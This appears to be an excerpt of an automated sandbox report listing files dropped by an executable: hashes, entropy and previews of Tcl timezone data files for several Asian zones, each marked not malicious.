                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):820
                                                                                                                                                                                                                              Entropy (8bit):3.969189280047274
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5we3dJvOt81FCuLqecDngO6jPvTpYy5T4TiFGDr:5BvdJqxiF0uGr
                                                                                                                                                                                                                              MD5:9ABD0ECB5F3E738F49CDD1F81C9FF1A4
                                                                                                                                                                                                                              SHA1:46B68C7BBD1BE9791B00128A5129AA3668435C93
                                                                                                                                                                                                                              SHA-256:550DB44595F59D0F151BE4AF70D6FECE20580AB687EF45DE2A0A75FB2515AC80
                                                                                                                                                                                                                              SHA-512:67E2B0EF216D509C4B6DD367519E0A733E54A7CA767D5F7960715E8056E61B7B633C7516D568544F55C9277E90412C1443B822C6EED3341C01F1BD9AA9476FA1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dushanbe) {.. {-9223372036854775808 16512 0 LMT}.. {-1441168512 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 21600 1 +06}.. {684363600 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7597
                                                                                                                                                                                                                              Entropy (8bit):3.7170041442081203
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:G3pv/7V6Aj8aZaNlK0UpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0l:G3v/AaaivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:F8E4BA3E260452AE13CF234E60149A62
                                                                                                                                                                                                                              SHA1:8DDB08E2FDEEF6539EE0C0038B166908BFED16CD
                                                                                                                                                                                                                              SHA-256:8CFE85C48FC22033411432F8B75EE4C097A5D84897698CB1AFD5AB51C47FF5A3
                                                                                                                                                                                                                              SHA-512:487177411FB7E9F83AB9AAD84B685322B13A85784D4F90BB9C30F57BFAA6A9298E5C4F36C97444DE1117E51F85A62DC639D08B405460D071C2B29C898553E9A3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Famagusta) {.. {-9223372036854775808 8148 0 LMT}.. {-1518920148 7200 0 EET}.. {166572000 10800 1 EEST}.. {182293200 7200 0 EET}.. {200959200 10800 1 EEST}.. {213829200 7200 0 EET}.. {228866400 10800 1 EEST}.. {243982800 7200 0 EET}.. {260316000 10800 1 EEST}.. {276123600 7200 0 EET}.. {291765600 10800 1 EEST}.. {307486800 7200 0 EET}.. {323820000 10800 1 EEST}.. {338936400 7200 0 EET}.. {354664800 10800 1 EEST}.. {370386000 7200 0 EET}.. {386114400 10800 1 EEST}.. {401835600 7200 0 EET}.. {417564000 10800 1 EEST}.. {433285200 7200 0 EET}.. {449013600 10800 1 EEST}.. {465339600 7200 0 EET}.. {481068000 10800 1 EEST}.. {496789200 7200 0 EET}.. {512517600 10800 1 EEST}.. {528238800 7200 0 EET}.. {543967200 10800 1 EEST}.. {559688400 7200 0 EET}.. {575416800 10800 1 EEST}.. {591138000 7200 0 EET}.. {606866400 10800 1 EEST}.. {622587
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8427
                                                                                                                                                                                                                              Entropy (8bit):3.7494839792487094
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NyHSd2XK1GbJFp3gP0nPVl8dcqU/8O8pc1FoMpQ2NpPfM2g1siiVVfIsuDzhsXaP:NyyIgGbJv3dPAD7c1FoMpHu3Ky3p
                                                                                                                                                                                                                              MD5:DEB2D261D6885CD83054391D010DE6AD
                                                                                                                                                                                                                              SHA1:5779B343F4EB2BC75613C593E2FA3A026857F940
                                                                                                                                                                                                                              SHA-256:A1823EDA63434ACF1A37B3A781A783CFEB6BB4CC53ED0469BB685834837F2289
                                                                                                                                                                                                                              SHA-512:D024B2D324D981A6792127551B0D466EAFFC5294C84CB5752A71E5267FB2E9162E7EFAED5A5CA3B06BBAD285F62BF955B0EF86DD39307EE5F935FC601F4EEEFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Gaza) {.. {-9223372036854775808 8272 0 LMT}.. {-2185409872 7200 0 EEST}.. {-933638400 10800 1 EEST}.. {-923097600 7200 0 EEST}.. {-919036800 10800 1 EEST}.. {-857347200 7200 0 EEST}.. {-844300800 10800 1 EEST}.. {-825811200 7200 0 EEST}.. {-812678400 10800 1 EEST}.. {-794188800 7200 0 EEST}.. {-779846400 10800 1 EEST}.. {-762652800 7200 0 EEST}.. {-748310400 10800 1 EEST}.. {-731116800 7200 0 EEST}.. {-682653600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-16580
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.86422571961583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFKwHp4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wKi4wKU
                                                                                                                                                                                                                              MD5:1BCCB3578FADE993EE8B2C11EAC06CD8
                                                                                                                                                                                                                              SHA1:CAEAB714E014CD5040C44E4603708B97BC0B03D4
                                                                                                                                                                                                                              SHA-256:12811A7944B892E3D1C0B4B09057CC1899F28081B3CD47FFD248BA49BA308AF0
                                                                                                                                                                                                                              SHA-512:1D791DC0E8F45359366DF33C2C337688D2E0E972A90F038733B840D28585505AEF542DDBAD014C9EA8C252048A588CD017DD67A84545A81EDB7C17E3B2E65092
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Harbin) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8402
                                                                                                                                                                                                                              Entropy (8bit):3.7520828858184325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:fXSd2XK1GbJFp3gP0nPVl8dcqUZ8O8pc1FoMpQ2NpPfM2g1siiVVfIsuDzhsXa4a:fiIgGbJv3dPADPc1FoMpHu3Ky3p
                                                                                                                                                                                                                              MD5:6F176787C7FC5764A63719F0041690BA
                                                                                                                                                                                                                              SHA1:C292A8CEA597D7FD9E2D071AB7AE93E7ABCA21A5
                                                                                                                                                                                                                              SHA-256:732CAA355542C8781C61FC8F5265EBFC59C8CC24E78D01011E1E3256E6B34DC7
                                                                                                                                                                                                                              SHA-512:EE8F39A3D65D75E14B59B4D9CCB27894210CA269E82A7AC7F98BE67764688A8895EBB9C1ACEAB4C1B368B4F1BC5AFCB34E8866CEDFD91232926DF47517096513
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hebron) {.. {-9223372036854775808 8423 0 LMT}.. {-2185410023 7200 0 EEST}.. {-933638400 10800 1 EEST}.. {-923097600 7200 0 EEST}.. {-919036800 10800 1 EEST}.. {-857347200 7200 0 EEST}.. {-844300800 10800 1 EEST}.. {-825811200 7200 0 EEST}.. {-812678400 10800 1 EEST}.. {-794188800 7200 0 EEST}.. {-779846400 10800 1 EEST}.. {-762652800 7200 0 EEST}.. {-748310400 10800 1 EEST}.. {-731116800 7200 0 EEST}.. {-682653600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-165
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):395
                                                                                                                                                                                                                              Entropy (8bit):4.431055857167822
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862RLmdHneCvhYC5sF/p+zHHviViksF/dMUYPsF/RQ9EsV:5de3vhd5sFR+znv2vsFlM/PsFVsV
                                                                                                                                                                                                                              MD5:A49A3D55C1E10A37125C51F9C6363868
                                                                                                                                                                                                                              SHA1:7C1B5D44643ADC3F02681F6379E82C3F4512F0C1
                                                                                                                                                                                                                              SHA-256:D8A19C70BE5A9AE1E6091DC8FD03D7719110D1F3D78786C91D5BD0949FB5A428
                                                                                                                                                                                                                              SHA-512:804C44E51BB9E93B156B0CB4CB125651003B3C42D65334A052BE149734221315CC75D4FBDE34F62DFC102F1A9C968D1C9B573839C7ECBF7397B61BD90E530B20
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ho_Chi_Minh) {.. {-9223372036854775808 25590 0 LMT}.. {-2004073590 25590 0 PLMT}.. {-1851577590 25200 0 +07}.. {-852105600 28800 0 +08}.. {-782643600 32400 0 +09}.. {-767869200 25200 0 +07}.. {-718095600 28800 0 +08}.. {-457776000 25200 0 +07}.. {-315648000 28800 0 +08}.. {171820800 25200 0 +07}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2226
                                                                                                                                                                                                                              Entropy (8bit):4.0055033036300145
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Ze9l9Pm4yoHtTYJJIX1Zcp6GS0j1SPQpP6gPE8fTZIPNYQGm75st/nQdwi9:DyaoTcwQt6EsQTng
                                                                                                                                                                                                                              MD5:26BCBBA28AE34FE3CF7D17EF4C6B69C8
                                                                                                                                                                                                                              SHA1:5324DEA8E7965C66650E7B4769EFA1297B508486
                                                                                                                                                                                                                              SHA-256:EE9A6997BC1AAD4A8FA95DB312774C3F37FBB895549230C30FC66C02CC170EB6
                                                                                                                                                                                                                              SHA-512:54594CD18838B4A8947EBB5BDE2415727CC127CF79AEC98FC0F5D5A32F68EEAF4E079853239DE9F753CE90F18EFD55AE51FC43D64E313666CEA0EF8AC93BF065
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hong_Kong) {.. {-9223372036854775808 27402 0 LMT}.. {-2056690800 28800 0 HKT}.. {-900910800 32400 1 HKST}.. {-891579600 30600 1 HKWT}.. {-884248200 32400 0 JST}.. {-761209200 28800 0 HKT}.. {-747907200 32400 1 HKST}.. {-728541000 28800 0 HKT}.. {-717049800 32400 1 HKST}.. {-697091400 28800 0 HKT}.. {-683785800 32400 1 HKST}.. {-668061000 28800 0 HKT}.. {-654755400 32400 1 HKST}.. {-636611400 28800 0 HKT}.. {-623305800 32400 1 HKST}.. {-605161800 28800 0 HKT}.. {-591856200 32400 1 HKST}.. {-573712200 28800 0 HKT}.. {-559801800 32400 1 HKST}.. {-541657800 28800 0 HKT}.. {-528352200 32400 1 HKST}.. {-510211800 28800 0 HKT}.. {-498112200 32400 1 HKST}.. {-478762200 28800 0 HKT}.. {-466662600 32400 1 HKST}.. {-446707800 28800 0 HKT}.. {-435213000 32400 1 HKST}.. {-415258200 28800 0 HKT}.. {-403158600 32400 1 HKST}.. {-383808600 28800 0 HKT
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1583
                                                                                                                                                                                                                              Entropy (8bit):3.7521760184466206
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5x3LecCvgsFFFKOksF8FpsF71FQnsFNFxhsFlF6sFaFasFZFisF8GF5sFKLFAZsZ:5FqKVx8Cq9f/y2L
                                                                                                                                                                                                                              MD5:A77140A0D8C2D3E2993E4BA7CADFB4C6
                                                                                                                                                                                                                              SHA1:AE3586264A86D42F578D4B0F7A30C9BE6047EAB1
                                                                                                                                                                                                                              SHA-256:CA88A45E954A9854C680B399E69E4858BF5E861FABFADC19D62D97B734B25415
                                                                                                                                                                                                                              SHA-512:05EA9D903EEC755F799B7C2399ED933245A5AE3A594648FE37AF1CE7699AE499B4ED159F428D91259D80BC9AF5117F2DA055A506AED94E5281C38B7AFF69C6FE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hovd) {.. {-9223372036854775808 21996 0 LMT}.. {-2032927596 21600 0 +06}.. {252439200 25200 0 +07}.. {417978000 28800 1 +07}.. {433785600 25200 0 +07}.. {449600400 28800 1 +07}.. {465321600 25200 0 +07}.. {481050000 28800 1 +07}.. {496771200 25200 0 +07}.. {512499600 28800 1 +07}.. {528220800 25200 0 +07}.. {543949200 28800 1 +07}.. {559670400 25200 0 +07}.. {575398800 28800 1 +07}.. {591120000 25200 0 +07}.. {606848400 28800 1 +07}.. {622569600 25200 0 +07}.. {638298000 28800 1 +07}.. {654624000 25200 0 +07}.. {670352400 28800 1 +07}.. {686073600 25200 0 +07}.. {701802000 28800 1 +07}.. {717523200 25200 0 +07}.. {733251600 28800 1 +07}.. {748972800 25200 0 +07}.. {764701200 28800 1 +07}.. {780422400 25200 0 +07}.. {796150800 28800 1 +07}.. {811872000 25200 0 +07}.. {828205200 28800 1 +07}.. {843926400 25200 0 +07}.. {859654800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2089
                                                                                                                                                                                                                              Entropy (8bit):3.7296034934492694
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5PZy4DdOKStci4KjXoYjoSvfQJWE00dtT43kgiTskNrrBizhzRBqY3M:Py2/svfraBGfgP
                                                                                                                                                                                                                              MD5:C9F7AC464970567E5C38CB01ED2297AE
                                                                                                                                                                                                                              SHA1:453718BACCAE3FACD761AF22CA5875185478ADDD
                                                                                                                                                                                                                              SHA-256:61BAAAD6315FFBDAED6F266880165B06ECCAF72F660B7FB01C8B654F3952D68E
                                                                                                                                                                                                                              SHA-512:72044EFAE262CC12974F2DE2AAF06AC4C31BE73071ACD53DDC6B8D8BFC6FBDF937EC03DC881901F730659BDE662FBCFC76C57B2C086DAA97F160530464FBA7C6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Irkutsk) {.. {-9223372036854775808 25025 0 LMT}.. {-2840165825 25025 0 IMT}.. {-1575874625 25200 0 +07}.. {-1247554800 28800 0 +09}.. {354902400 32400 1 +09}.. {370710000 28800 0 +08}.. {386438400 32400 1 +09}.. {402246000 28800 0 +08}.. {417974400 32400 1 +09}.. {433782000 28800 0 +08}.. {449596800 32400 1 +09}.. {465328800 28800 0 +08}.. {481053600 32400 1 +09}.. {496778400 28800 0 +08}.. {512503200 32400 1 +09}.. {528228000 28800 0 +08}.. {543952800 32400 1 +09}.. {559677600 28800 0 +08}.. {575402400 32400 1 +09}.. {591127200 28800 0 +08}.. {606852000 32400 1 +09}.. {622576800 28800 0 +08}.. {638301600 32400 1 +09}.. {654631200 28800 0 +08}.. {670356000 25200 0 +08}.. {670359600 28800 1 +08}.. {686084400 25200 0 +07}.. {695761200 28800 0 +09}.. {701805600 32400 1 +09}.. {717530400 28800 0 +08}.. {733255200 32400 1 +09}.. {748
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.9013773460609
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV0XaDovXHAIgoq3XRFvHRL/2WFK4HB/8QaqXKv:SlSWB9vsM3ymQa2HAIgoQ/HN/2wK4HJa
                                                                                                                                                                                                                              MD5:8A92C690BE27A69D122BFF51479B7B56
                                                                                                                                                                                                                              SHA1:52DB64587A347F34153A51788BDE8C349D966575
                                                                                                                                                                                                                              SHA-256:1F77C4BD27574E1D2066885DEF01806A02D3E444424A219A8EC5C114F89665E5
                                                                                                                                                                                                                              SHA-512:FEDF57C4862B6792A789F339EB1027EC8A8472B01B7D1D0814C419850B9AC03A7B454FDB04D8BECE166E9A8BCAA58B0B461007A6C824B30B1080991A1DB49CCA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Istanbul)]} {.. LoadTimeZoneFile Europe/Istanbul..}..set TZData(:Asia/Istanbul) $TZData(:Europe/Istanbul)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):370
                                                                                                                                                                                                                              Entropy (8bit):4.4733192761103515
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKcrJfDm2OHATJeoHMaSYov/YSZkc5q/MVSSFFWSyvScH+dMVSSFL+:MB862EJLmdHjCEdOc5aMxaSyHHaMxF6P
                                                                                                                                                                                                                              MD5:C689A1AA9FFE535AEB3AD3D7EDE55172
                                                                                                                                                                                                                              SHA1:0520FC9A4619FB555A79C5DF2AE82422BF2C5EDA
                                                                                                                                                                                                                              SHA-256:2F39D9F93761B85C254F458317A7DE2B4184BE9459F2193A85C08662E801269A
                                                                                                                                                                                                                              SHA-512:C1034FB2FCFEF201C5362AF21B048B6637A824C5C93D75854CF3807892C772CD4376533E58BFF8D8726F531F43CB231365B8012EBD3C1BECED865D3CD2D6673D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jakarta) {.. {-9223372036854775808 25632 0 LMT}.. {-3231299232 25632 0 BMT}.. {-1451719200 26400 0 +0720}.. {-1172906400 27000 0 +0730}.. {-876641400 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 25200 0 WIB}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):213
                                                                                                                                                                                                                              Entropy (8bit):4.834345288972067
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKcaDm2OHG4YoH1kcfvScHVowkVcr2CV4zvhyov:MB862PmdHNYC6cfHHVop2NVkoov
                                                                                                                                                                                                                              MD5:2CB3A13FCC48F8C4457E001FC309918B
                                                                                                                                                                                                                              SHA1:83174176815CB93D216B5BC532C120EC8AC433CF
                                                                                                                                                                                                                              SHA-256:761C1E80FEBF46D6D6215CEBF211F121974156D9BCE2FB4258C1074C6ED2CE22
                                                                                                                                                                                                                              SHA-512:65009020AB9FEC2F8158A4851A78B71127F9B262DDD1472583942E19B7C086304F54BC8DAE5A40BD1448BCAEDA0FDBACCD19400E10FFA0357E324535F9036EF0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jayapura) {.. {-9223372036854775808 33768 0 LMT}.. {-1172913768 32400 0 +09}.. {-799491600 34200 0 +0930}.. {-189423000 32400 0 WIT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8135
                                                                                                                                                                                                                              Entropy (8bit):3.770028446231146
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:GKfnxFAEX/nPVl8diAg9oEhH20AHz7LzdWhYbBJPXuVhKaM76Rmg4DLeEcNptv5C:7ffBvPAzF0AHzPzdD1+XBRF0
                                                                                                                                                                                                                              MD5:884227D48C92BA6C519BFE571D4F1037
                                                                                                                                                                                                                              SHA1:21F8977816C2B439686A50D353B836A6D132A946
                                                                                                                                                                                                                              SHA-256:0BDC2C693134199C2ECD374CC01468813DB29DF47422C706A3EA2BE5ECCA177A
                                                                                                                                                                                                                              SHA-512:8A09F1FE11DAD203501A16FE6A2CAEC969FE3553B456B8BD1997E55B3EE430B2BB4B54F7D87C5E99931FD96E7C769CAA618C777EBD23FBD1E1A0F57409422914
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jerusalem) {.. {-9223372036854775808 8454 0 LMT}.. {-2840149254 8440 0 JMT}.. {-1641003640 7200 0 IST}.. {-933638400 10800 1 IDT}.. {-923097600 7200 0 IST}.. {-919036800 10800 1 IDT}.. {-857347200 7200 0 IST}.. {-844300800 10800 1 IDT}.. {-825811200 7200 0 IST}.. {-812678400 10800 1 IDT}.. {-794188800 7200 0 IST}.. {-779846400 10800 1 IDT}.. {-762652800 7200 0 IST}.. {-748310400 10800 1 IDT}.. {-731116800 7200 0 IST}.. {-681955200 14400 1 IDDT}.. {-673228800 10800 1 IDT}.. {-667958400 7200 0 IST}.. {-652320000 10800 1 IDT}.. {-636422400 7200 0 IST}.. {-622080000 10800 1 IDT}.. {-608947200 7200 0 IST}.. {-591840000 10800 1 IDT}.. {-572486400 7200 0 IST}.. {-558576000 10800 1 IDT}.. {-542851200 7200 0 IST}.. {-527731200 10800 1 IDT}.. {-514425600 7200 0 IST}.. {-490838400 10800 1 IDT}.. {-482976000 7200 0 IST}.. {-459388800 10800 1 I
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.8546989169864085
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKTtNMXGm2OHodFxsYoHvgVHURRNVsRYovFFFkdj/cXHF:SlSWB9eg/2wKTPDm2OHoH+YoHvgVHURA
                                                                                                                                                                                                                              MD5:9BD9B21661C235C0794078EC98978D3B
                                                                                                                                                                                                                              SHA1:3D854780F49D0E5F5A190DC9367C7406127C5E4D
                                                                                                                                                                                                                              SHA-256:A59C95C038F2E945D685D96FA9B859CE82A643A1B7F56EB36B2C809DE91CD4BA
                                                                                                                                                                                                                              SHA-512:A76E99CF03DA8897F0A210A98DB79E4CD60070F2BE363D0D0960D9882919F9B49978FA55BB2500F1648ADD4080730CAD85BAFF61D885A9EAD394AC04C850F6BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kabul) {.. {-9223372036854775808 16608 0 LMT}.. {-2524538208 14400 0 +04}.. {-788932800 16200 0 +0430}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2060
                                                                                                                                                                                                                              Entropy (8bit):3.788131608921229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5+SeWI/2kkWk7YFpR2kHmxCcUdBbcHDLV2vpXt25A0UeRr9ydzkMfF6USRWk9UuV:5i/2ZsFLrcZwvJt2F+doTr9Q3G80
                                                                                                                                                                                                                              MD5:390F39934F095F89358B73D056D90264
                                                                                                                                                                                                                              SHA1:6B57CE5346B50ED88BFBB6BC57F834FB3F564905
                                                                                                                                                                                                                              SHA-256:6E0278E389072437BC07A5032CD58E9E5B1B2BDB20918632C422EFA97BC43ABF
                                                                                                                                                                                                                              SHA-512:6C54D94E95D73030F2FFCF8D130494CBD79FB1CEB9B59ADE0743C10F02557C3DD59CC6274B262A7E29C2D4C35DDA4B6A9A0398C661F5BD40F3B92181192B9577
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kamchatka) {.. {-9223372036854775808 38076 0 LMT}.. {-1487759676 39600 0 +11}.. {-1247569200 43200 0 +13}.. {354888000 46800 1 +13}.. {370695600 43200 0 +12}.. {386424000 46800 1 +13}.. {402231600 43200 0 +12}.. {417960000 46800 1 +13}.. {433767600 43200 0 +12}.. {449582400 46800 1 +13}.. {465314400 43200 0 +12}.. {481039200 46800 1 +13}.. {496764000 43200 0 +12}.. {512488800 46800 1 +13}.. {528213600 43200 0 +12}.. {543938400 46800 1 +13}.. {559663200 43200 0 +12}.. {575388000 46800 1 +13}.. {591112800 43200 0 +12}.. {606837600 46800 1 +13}.. {622562400 43200 0 +12}.. {638287200 46800 1 +13}.. {654616800 43200 0 +12}.. {670341600 39600 0 +12}.. {670345200 43200 1 +12}.. {686070000 39600 0 +11}.. {695746800 43200 0 +13}.. {701791200 46800 1 +13}.. {717516000 43200 0 +12}.. {733240800 46800 1 +13}.. {748965600 43200 0 +12}.. {764
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):457
